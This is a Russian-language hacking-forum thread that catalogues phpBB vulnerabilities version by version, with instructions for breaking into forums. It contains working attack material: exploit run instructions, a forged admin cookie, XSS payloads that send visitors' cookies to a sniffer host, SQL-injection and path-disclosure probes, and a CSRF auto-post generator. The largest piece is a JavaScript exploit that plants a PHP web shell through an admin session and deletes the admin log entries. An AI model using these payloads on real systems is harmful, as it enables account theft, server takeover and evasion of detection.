[Обзор уязвимостей phpBB]

administrator

Рассмотрим каждую версию форума по порядку и проанализируем. Будем рассматривать с версии 2.0.4, т.к. версии младше, обсуждать нет смысла.

phpBB <= 2.0.4
Цель: просмотр содержимого файлов на сервере
Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети.
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: http://milw0rm.com/id.php?id=47

phpBB <= 2.0.5
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш.
Exploit: http://milw0rm.com/id.php?id=44
При запуске $remote = shift || 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift || 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl"
Video: -

phpBB <= 2.0.6
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php.
Exploit: http://milw0rm.com/id.php?id=137
Запускаем "perl exp.pl <server> <folder> <user_id> <search_id>"
Где <server> - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), <folder> - папка где находится сам форум (например если у нас http://123.123.123.123/forum/index.php, вместо <folder> пишем forum), <user_id> <search_id> - ID пользователя.
Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar

phpBB <= 2.0.8
Цель: подмена ip
Описание: так себе
Описание уязвимости: позволяет подменить ip отправителя на произвольный
Exploit: http://securityvulns.ru/Gdocument110.html

phpBB 2.0.10
Пропустим версии с 7 по 9, т.к. в них присутствует те же уязвимости, что и в phpBB 2.0.10.
Цель: (1) Выполение произвольных команд.
Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php.
Exploit: http://milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]"
Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix http://forum.antichat.ru/threadnav7345-1-10.html)
video: -

Цель: (2) Попадание в админку обходя ограничения.
Описание: -
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: В архиве с видео =)
Video: http://video.antichat.net/videos/wizi/vhackbbshwizi.rar

phpBB <= 2.0.11
Цель: Выполение произвольных команд
Описание: Была выпущена так же в 2002.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php - горе-кодеры плохо запатчили предыдущую багу - фильтрация ковычки обходится как %2527
Exploit: http://www.site.ru/forum/viewtopic.php?t=2726&highlight=%27.$poster=`$var`.%27&var=id

phpBB <= 2.0.12
Цель: Вход на форум аккаунтом администратора.
Описание: -
Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies),
вместо
Цитата:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D
X - наш ID ,
а меняем на
Цитата:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
2 - как уже говорилось выше, ID админа
Exploit: "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
Video: -

phpBB <= 2.0.13
Цель: просмотр hash'a пароля, любого пользователя
Описание: -
Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции
Exploit: http://milw0rm.com/id.php?id=907
Запускать "perl exp.pl <site> <dir> <id>"
Где <site> URL сайта <dir> - директория <id> - нужный нам пользователь
Video: -

phpBB <= 2.0.15
Цель: получение Имя,Логина, Пароля от БД.
Описание: -
Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php.
Exploit: http://milw0rm.com/id.php?id=1080 Запускать "perl exp.pl <server> <dir> <id> \r\n"
Где <server> - ip сервера, <dir> - директория в которой находится форум <id> номер существующего топика.
Video: -

phpBB <= 2.0.16
Цель: получение hash'a пароля пользователя
Описание: -
Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут http://antichat.ru/txt/xssoverview/ или http://ha.ckers.org/xss.html), которая получить кукисы. Они высылаются на сниффер,
логи которого можно посмотреть здесь http://antichat.ru/sniff/log.php.
Exploit:
Код:
[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Video: -

phpBB <= 2.0.16
Цель: 2.0.16 Installation Path Disclosure
Описание: -
Описание уязвимости: раскрытие данных
Exploit: http://someshit.net/showthread.php?t=71
Video: -

phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание: -
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"
Где <URL> - ссылка до форума например http://site.com/phpBB/, <cmd> - нужная команда (о командах читаем тут http://forum.antichat.ru/threadnav7345-1-10.html).
Video: -

phpbb <= 2.0.18
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:
Код:
<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L L O </B>

Код:
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='fon t-size:0; X="<B ">'</B>

PHP код:
http://www.[url=http://wj.com/style=display:none;background:url(javascript:alert ()) ]wj[/url]

phpBB <= 2.0.18
Цель: получение hash'a пароля пользователя
Описание: найдена WJ (White Jordan =)
Описание уязвимости: В данной версии присутствует XSS.
Exploit:
Код:
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"&#40")
Video: -

phpBB <= 2.0.18
Цель: подмена ника
Описание: найдена Dgoing
Описание уязвимости: подмена ника, обход бана
Exploit: http://forum.antichat.ru/thread19817.html
Video: -

phpbb <= 2.0.19
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:
Код:
<B C='>' onmouseover='alert(document.location="http://antichat.ru"+document.cookie)' X='<B '> antichat.ru </B>

PHP код:
http://www.-

phpbb <= 2.0.19
Цель: получение пароля админа
Описание: phpBB Style Changer\Viewer MOD SQL injection Exploit
Описание уязвимости: sql-inj уязвимость в index.php?s=[SQL] позволяет выполнить произвольный запрос в бд
Exploit: http://milw0rm.com/exploits/1469

phpbb = 2.0.19
Цель: DoS форума
Описание: -
Описание уязвимости: Уязвимость позволяет забанить всех пользователей на форуме
Exploit: http://forum.comp-info.ru/showthread.php?threadid=238

phpbb <= 2.0.19
Цель: DoS форума
Описание: Neo Security Team (автор - HaCkZaTaN)
Описание уязвимости: Сплоит регистрирует неограниченное количество ников или делает через поиск запросы, которые база не может воспринять. Сплойт бессилен там, где надо вводить код (визуальное подтверждение) при регистрации
Exploit: http://www.h4cky0u.org/advisories/HYSA- … -phpbb.txt

phpbb <= 2.0.19
Цель: получение пароля админа
Описание: Уязвимость позволяет удаленному пользователю произвести брут-форс атаку.
Описание уязвимости: Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи.
Exploit: http://milw0rm.com/exploits/1382

phpbb <= 2.0.20
Цель: DoS форума
Описание: банит все аккаунты
Описание уязвимости: по умолчанию в форуме включен бан аккаунта при более 5 неудачных попыток входа
Exploit: phpBB 2.0.20 Disable Admin or User Account
Video: -

phpBB <= 2.0.21
Цель: компрометация сервера
Описание: obviously you have no output, but this makes phpbb to be like a http proxy
Описание уязвимости: а в переводе - phpbb можно использовать как прокси, посылая запрос в удаленном урле аватара; также форум не проверяет контент загружаемых аватарах в EXIF тэгах, туда мона поместить PHP-код и потом какнить приинклудить. Вот.
Exploit: http://www.securityfocus.com/archive/1/433858

phpBB <= 2.0.21
Цель: получение сессии админа
Описание: XSS нападение и CSRF атака
Описание уязвимости: 1)Уязвимость существует из-за того, что приложение не проверяет валидность HTTP запроса при отправке сообщений. 2) Уязвимость существует из-за недостаточной обработки входных данных в поле "Message body" в сценарии privmsg.php.
Exploit: http://www.securitylab.ru/vulnerability/281494.php

[Shell, Version, Full Path]
Рассмотренно подробно ниже.

[Авторы, соавторы]
NaX[no]rt, qBiN, модераторы раздела "Форумы

0

administrator

1) Хочу понять, как же взламываются форумы phpbb.
Их можно взломать 5 способами:
1) Через уязвимость highlight. Дает исполнение команд на сервере. Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
2) Получить доступ к аккаунту администратора.
3) Через уязвимость в профайле signature_bbcode_uid Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
4) Взлом через моды.
5) Взлом через sql инъекцию.

2) Как получить аккаунт администратора на форуме?
1) Угадать, украсть, спросить.
2) XSS - позволяет украсть куки администратора и под ним зайти на форум. В версиях >2.0.19 нельзя войти в админку незная пароля.
xss для форума phpbb. Почти все найдены White Jordan.

[c*olor*=#EFE*FEF][forbidden link][/UR*L]

phpbb 2.0.17 Рушиться структура, код надо доработать
[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg]

[*url]ww*w.ut[forbidden link][/u*rl]'

[*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]

пихаем все эти коды в сообщение, на сниффере ловим куки, подставляем их, и мы админы.

3) Получение админского аккаунта через багу в куках.
phpbbmysql_data:a%3A2%3A%7Bs%3A11%3A%22autologinid %22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222% 22%3B%7D

И мы становимся админом (если форум не пропатчен).

3) Как происходит взлом?
1) Просмотр версии форума. Она определяется заходом по ссылке http://site.ru/forum/docs/CHANGELOG.html
Смотрим какая там последняя версия и прибавляем единицу.
2) Проверку на уязвимость форума к багам highlight, админским кукам, signature_bbcode_uid.
Если сработало, иди в раздел "Заливка шелла в phpbb". Если не сработало.
3) Проверяем форум на sql уязвимости.
Делаем запросы:
http://site.ru/forum/viewtopic.php?sid= … pic_id=-1'
http://site.ru/forum/search.php?search_id=-1'
http://site.ru/forum/search.php?search_results=-1'
Если сработало, то добываем хеш админа, расшифровываем.
4) Если ничего не помогло, теперь надо проверить форум на дырки в модах.
запросы:
http://site.ru/forum/language/lang_engl … tivity.php include
http://site.ru/forum/admin/addentry.php include
http://site.ru/forum/m2f/m2f_phpbb204.php include
http://site.ru/forum/admin/admin_topic_ … ogging.php include
http://site.ru/forum/cal_view_month.php sql
http://site.ru/forum/auction_offer_view.php sql
http://site.ru/forum/downloads.php sql
http://site.ru/forum/alltopics.php sql
http://site.ru/forum/admin/admin_cash.php include
http://site.ru/forum/toplist.php sql
http://site.ru/forum/index.php?s=-1' sql
http://site.ru/forum/index.php?style=-1' sql
Запросы для получение привилегий найдете на секьюрити порталах.
5) Взлом через xss.

4) Как узнать серверный путь форума?
http://site.ru/forum/admin/admin_disall … modules=00 до 2.0.19
http://site.ru/forum/profile.php?mode[]=
http://site.ru/forum/posting.php?mode[]=
http://site.ru/forum/groupcp.php?mode[]=
http://site.ru/forum/modcp.php?mode[]=
http://site.ru/forum/privmsg.php?folder[]=
http://site.ru/forum/db/oracle.php
http://site.ru/forum/memberlist.php?mode[]=cx + дает возможно узнать префикс таблиц базы данных

Пути для форумов <2.0.10
http://site.ru/forum/index.php?category_rows=aaaa
http://site.ru/forum/faq.php?faq=aaaa
http://site.ru/forum/profile.php?mode=v … ksrow=aaaa

5) Как узнать префикс таблиц базы данных?
http://site.ru/forum/memberlist.php?mode[]=cx
http://site.ru/forum/modcp.php?t=-456

подробно о каждой баге можете почитать здесь
http://forum.antichat.ru/thread24488.html

Про залитие шелла в phpbb можете почитать здесь http://forum.antichat.ru/thread32782.html

0

administrator

Full path disclosure:

profile.php?mode=viewprofile&u=2&ranksrow=abcdabcd
faq.php?mode=bbcode&faq=abcdabcd
viewtopic.php?p=6&highlight=\abcdabcd
admin/admin_disallow.php?setmodules=1
db/oracle.php
viewtopic.php?t=395&postorder[]=kala
memberlist.php?mode[]=cx
memberlist.php?start=-1
privmsg.php?folder[]=
profile.php?mode[]=
posting.php?mode[]=
groupcp.php?mode[]=
modcp.php?mode[]=
index.php?category_rows=aaaa
profile.php?mode=viewprofile&u=2&ranksrow=aaaa
faq.php?faq=aaaa

0

administrator

Passive XSS 2.0.22
1) Пассивная XSS: нефильтруется переменная cur_password при замене пароля

2) Opencosmo Security
http://www.opencosmo.com

Author: Alfredo Panzera, Opencosmo Security
Vendor: phpBB.com
Version: 2.0.22

Exploit:
Go to http://[website]/forum/admin/admin_groups.php and into 'Group description:' insert your XSS.

3) PhpBB [profile.php] Permanent Xss Vulnerability
Sep 20 2007 04:35PM
Found By Seph1roth

[POST METHOD]

Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info

Bugged Variable: "selfdes" (Campo "Altre informazioni")

Xss: </textarea>[XSS STRING]

0

administrator

phpBB Topic AutoSender

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

--------------------------------------------------------------

0day Auto Sender Post phpBB2

---------------------------------------------------------------

# Coded by TuoNuX

# Description:

autosendform generator

---------------------------------------------------------------

---------------------------------------------------------------
asf.pl
---------------------------------------------------------------

#/usr/bin/perl
#0day Auto Sender Post phpBB2
#TuoNuX@hotmail.it
#http://www.localh0st.altervista.org
#http://www.hackingz0ne.altervista.org
print q {
__________________________________________________ ___________________

___ _ _ __ _
|_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2
| || | |/ . \| || | | \ \ * TuoNuX@hotmail.it
|_|`___|\___/|_\_|`___|_/\_\ * http://www.localh0st.altervista.org
* http://www.hackingz0ne.altervista.org
0day Auto Sender Post phpBB2

__________________________________________________ ___________________
};
print q {
[+]Insert host site :
[-]Indirizzo: };
$indirizzo = <stdin>;
chomp($indirizzo);
print q {
__________________________________________________ ___________________
[+]Insert the forum path (for example /phpBB/) :
[-]Cartella: };
$cartella = <stdin>;
chomp($cartella);
print q {
__________________________________________________ ___________________
[+]Insert ID section ( number after "?f=" ):
[-]ID Sezione: };
$id = <stdin>;
chomp($id);
print q {
__________________________________________________ ___________________
[+]Insert Topic Title :
[-]Titolo: };
$titolo = <stdin>;
chomp($titolo);
print q {
__________________________________________________ ___________________
[+]Insert the body topic :
[+]Yuc can use also the BB code es: --
[-]Testo: };
$testo = <stdin>;
chomp($testo);
print q {
__________________________________________________ ___________________
[+]Insert the victim sid , don't write everyone if there isn't it :
[-]Sid: };
$sid = <stdin>;
chomp($sid);
$sito = "http://$indirizzo$cartella";
print "\n----------------Riepilogo----------------------\n\n";
print "Forum => $sito\n";
print "ID Section => $id\n";
print "Title => $titolo\n";
print "Message => $testo\n";
print "SID => $sid\n\n";
print "----------------Riepilogo----------------------\n\n";
print "Enter for continued....";
<stdin>;
$m1 = q {<html><head><body><form action="};
$m2 = "$sito";
$m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">};
$m4 = "$testo";
$m5 = q {</textarea><input type="hidden" value="};
$m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n";
$m6 = "$titolo";
$m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="};
$m8 = "$id";
$m9 = q {"> <input type="hidden" name="sid" value="};
$m10 = "$sid";
$m11 = q {" /></form><script>document.post.submit()</script></html></head></body>};
$html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11";
open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" );
print FILE $html;
close ( FILE );
print q {
__________________________________________________ ___________________

0

administrator

1. Активный межсайтовый скриптинг phpBB 3.0.x-3.0.6.

BB-тег [flash] неотфильтрован чуть менее, чем полностью.

[flash=1,1]javascript:confirm(/lo/);//lo[/flash]

По умолчанию данный тег недоступен для зарегистрированных пользователей, но его можно разрешить для использования в личных сообщениях.

Работоспособность : Opera & Safari

Но есть ли там ещё XSS? O, да!

2. Автозагрузка шелла/ бэкдора и т.д. через XSS.

Для работы скрипта требуется, чтобы администратор был авторизован в админ. панеле.

Эксплойт реализует метод, описанный здесь: https://forum.antichat.ru/showpost.php? … tcount=36:

* Скрипт не станет повторно добавлять php-код, если он уже имеется в шаблоне.

* В логе администратора удаляются записи только о произведенных действиях.

Шелл будет доступен по адресу: http://vulnsite.xz/forum/ucp.php?mode=login&lo=test

Также рекомендуется ознакомиться с этим https://forum.antichat.ru/showpost.php? … stcount=37

Эксплойт:

/*/ phpBB 3.0.x-3.0.6 shell-inj.

/// Example:

javascript:with(document) getElementsByTagName('head').item(0).appendChild( createElement('script')).src='http://yoursite.xz/shell-inj.js';void(0);

/// LeverOne. 12.2009
/*/

phpcode = ' if($_GET[lo]) echo($_GET[lo]); ';
template_file = 'login_body.html';

// выделение базового url (директория админки и сессия) из главной страницы

get_base_url(location.pathname.substring(0, location.pathname.lastIndexOf('/') + 1)+'#');

function get_base_url(url) {
requester('GET', url, null,
function() {
if (r.readyState == 4) {
base_url = r.responseText.match(/\.\/.+?\?sid=.{32}/);
if (base_url != null)
get_default_style(base_url);
}
}
);
}

// получение названия стиля по умолчанию

function get_default_style(base_url) {
requester('GET', base_url + '&i=styles&mode=style', null,
function() {
if (r.readyState == 4) {
default_style = r.responseText.match(/<strong>(.+?)<\/strong> \*/)[1];
get_templ_id(default_style, base_url);
}
}
);
}

// получение id шаблона по умолчанию

function get_templ_id(default_style, base_url) {
requester('GET', base_url + '&i=styles&mode=template', null,
function() {
if (r.readyState == 4) {
expr = new RegExp(default_style + '[\\w\\W]+?(id=\\d+)"', 'm');
templ_id = r.responseText.match(expr)[1];
to_edit_templ(templ_id, base_url);
}
}
);
}

// на пути к редактированию шаблона...

function to_edit_templ(templ_id, base_url) {
requester('GET', base_url + '&i=styles&mode=template&action=edit&' + templ_id, null,
function() {
if (r.readyState == 4) {

creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];
form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];
postdata = 'template_file=' + template_file + '&creation_time=' + creation_time + '&form_token=' + form_token;
edit_templ(templ_id, base_url, postdata);
}
}
);
}

// редактирование шаблона

function edit_templ(templ_id, base_url, postdata) {
requester('POST', base_url + '&i=styles&mode=template&action=edit&' + templ_id + '&text_rows=20', postdata,
function() {
if (r.readyState == 4) {
template_data = r.responseText.match(/rows="20">([\w\W]+)<\/textarea/mi)[1];
template_data = template_data.replace(/</g, '<').replace(/>/g, '>').replace(/"/g, '"').replace(/&/g, '&');
if (template_data.indexOf(phpcode) == -1) {
template_data = encodeURIComponent(template_data + phpcode);
creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];
form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];
postdata = 'template_data=' + template_data + '&template_file=' + template_file +'&creation_time=' + creation_time + '&form_token=' + form_token + '&save=1';
setTimeout("send_edit_templ(templ_id, base_url, '" + postdata + "')", 1000);
}

}
}
);
}

// отправка редактированного шаблона

function send_edit_templ(templ_id, base_url, postdata) {
requester('POST', base_url + '&i=styles&mode=template&action=edit&' + templ_id + '&text_rows=20', postdata,
function() {
if (r.readyState == 4) {
to_allow_php(base_url);
}
}
);
}

// переход на страницу настроек безопасности

function to_allow_php(base_url) {
requester('GET', base_url + '&i=board&mode=security', null,
function() {
if (r.readyState == 4) {
creation_time = r.responseText.match(/creation_time" value="(\d+)/i)[1];
form_token = r.responseText.match(/form_token" value="(.+?)"/i)[1];
postdata = 'config%5Btpl_allow_php%5D=1&submit=1&creation_time=' + creation_time + '&form_token=' + form_token;
setTimeout("allow_php(base_url, '" + postdata + "')", 1000);
}
}
);
}

// разрешение php в настройках

function allow_php(base_url, postdata) {
requester('POST', base_url + '&i=board&mode=security', postdata,
function() {
if (r.readyState == 4) {
to_delete_log(base_url);
}
}
);
}

// на пути к удалению логов...

function to_delete_log(base_url) {
requester('GET', base_url + '&i=logs&mode=admin', null,
function() {
if (r.readyState == 4) {
log_num = r.responseText.match(/mark\[\]" value="(\d+)/g);
postdata = 'mark%5B%5D='+ log_num[0].substring(15) + '&mark%5B%5D=' + log_num[1].substring(15) + '&mark%5B%5D=' + log_num[2].substring(15) + '&delmarked=1';
delete_log(base_url, postdata);
}
}
);
}

// удаление логов

function delete_log(base_url, postdata) {
requester('POST', base_url + '&i=logs&mode=admin', postdata,
function() {
if (r.readyState == 4) {
confirm_uid = r.responseText.match(/confirm_uid" value="(\d+)/i)[1];
sess = r.responseText.match(/sess" value="(.+?)"/i)[1];
sid = r.responseText.match(/sid" value="(.+?)"/i)[1];
confirm = r.responseText.match(/confirm" value="(.+?)"/i)[1];
postdata = postdata + '&confirm_uid=' + confirm_uid + '&sess=' + sess + '&sid=' + sid + '&confirm=' + encodeURIComponent(confirm);
confirm_key = r.responseText.match(/confirm_key=(.+?)"/i)[1];
confirm_delete_log(base_url, postdata, confirm_key);
}
}
);
}

// подтверждение удаления логов

function confirm_delete_log(base_url, postdata, confirm_key) {
requester('POST', base_url + '&i=logs&mode=admin&confirm_key='+ confirm_key, postdata, null
);
}

// универсальная функция запроса

function requester(method, url, postdata, func) {
try {r = new XMLHttpRequest()} catch(err) {r = new ActiveXObject('Msxml2.XMLHTTP')}
r.open(method, url + '&r=' + Math.ceil(1000*Math.random()));
if (method == 'POST') r.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
r.onreadystatechange = func;
r.send(postdata);
}

0

administrator

phpBB 3.0.7

################################################## ####################
#
# PHPBB Version 3.0.7 Remote File Include !
#
# Author : D.0.M TEAM
#
# Founded By : S3Ri0uS !
#
# We Are : Inj3ct0r.com Exploit and Vulnerability Database.
#
# Public Site : WwWAnti-Secure.CoM !
#
# Security Site : WwWD0M-Security.CoM !
#
# Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !
#
# Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !
#
# SpT : All Iranian Hackers !
#
################################################## ####################
#
# Dork :
#
# inurl:"powered by PHPBB Version 3.0.7"
#
# Exploit :
#
# http://www.site.com/path/common.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/cron.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/faq.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/feed.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/mcp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/memberlist.php … root_path=[shell code]
#
# http://www.site.com/path/posting.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/report.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/search.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/style.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/ucp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/viewforum.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/swatch.php … root_path=[shell code]
#
# http://www.site.com/path/download/file. … root_path=[shell code]
#
# http://www.site.com/path/includes/auth. … root_path=[shell code]
#
# http://www.site.com/path/includes/funct … root_path=[shell code]
#
# http://www.site.com/path/includes/funct … root_path=[shell code]
#
# http://www.site.com/path/includes/sessi … root_path=[shell code]
#
# http://www.site.com/path/includes/templ … root_path=[shell code]
#
# http://www.site.com/path/includes/acm/a … root_path=[shell code]
#
# http://www.site.com/path/includes/acp/a … root_path=[shell code]
#
# http://www.site.com/path/includes/utf/u … root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/u … root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/u … root_path=[shell code]
#
################################################## ####################

0

[Обзор уязвимостей phpBB]

Сообщений 1 страница 7 из 7

Поделиться12011-03-08 23:05:15

Поделиться22011-03-08 23:06:57

Поделиться32011-03-08 23:07:55

Поделиться42011-03-08 23:08:31

Поделиться52011-03-08 23:09:44

Поделиться62011-03-08 23:11:09

Поделиться72011-03-08 23:11:59